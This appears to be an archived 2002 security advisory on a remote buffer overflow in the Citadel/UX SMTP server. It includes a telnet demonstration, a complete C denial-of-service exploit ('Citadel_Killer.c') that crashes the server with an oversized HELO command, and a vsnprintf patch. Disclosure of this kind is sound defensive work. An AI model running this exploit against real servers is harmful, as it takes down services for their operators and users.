12th Mar 2002 [SBWID-5181]
COMMAND
Citadel remote buffer overflow leads to DoS
SYSTEMS AFFECTED
Citadel v5.90??
PROBLEM
xperc posted :
An attacker can execute a denial of service attack against Citadel.
Once the big buffer has been sent, the server is vulnerable.
Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is \'^]\'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]
[buffer] is around 4096 characters.
/* Citadel_Killer.c
*
* Remote Denial of Service Citadel/UX Server.
*
* by xperc@hotmail.com
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define MAXBUF 8000
#define MAXBUF2 MAXBUF+6
#define RECVBUF 256
#define CIT_SMTP 25
int main(int argc, char *argv[])
{
int sockfd;
char msg[RECVBUF],buf[MAXBUF],sendbuf
[MAXBUF2];
struct sockaddr_in target;
if(argc!=2){
fprintf(stderr,\"Usage: %s
target_address\\n\",*argv);
exit(-1);
}
if((sockfd=socket
(AF_INET,SOCK_STREAM,0))<0){
perror(\"socket\");
exit(-1);
}
target.sin_family=AF_INET;
target.sin_port=htons(CIT_SMTP);
target.sin_addr.s_addr=inet_addr(argv[1]);
if(connect(sockfd,(struct sockaddr*)
&target,sizeof(target))<0){
perror(\"connect\");
exit(-1);
}
if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
perror(\"recv\");
exit(-1);
}
memset(buf,\'a\',MAXBUF);
snprintf(sendbuf,sizeof(sendbuf),\"helo %
s\",buf);
strcat(sendbuf,\"\\n\");
send(sockfd,sendbuf,strlen(sendbuf),0);
close(sockfd);
return 0;
}
SOLUTION
Patch for this Vulnerability:
--- citadel-old/sysdep.c Sat Dec 8 12:31:44
2001
+++ citadel/sysdep.c Sat Mar 9 05:51:11
2002
@@ -106,7 +106,7 @@
char buf[4096];
va_start(arg_ptr, format);
- vsprintf(buf, format, arg_ptr);
+ vsnprintf(buf, sizeof(buf), format, arg_ptr);
va_end(arg_ptr);
if (loglevel <= verbosity) {
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
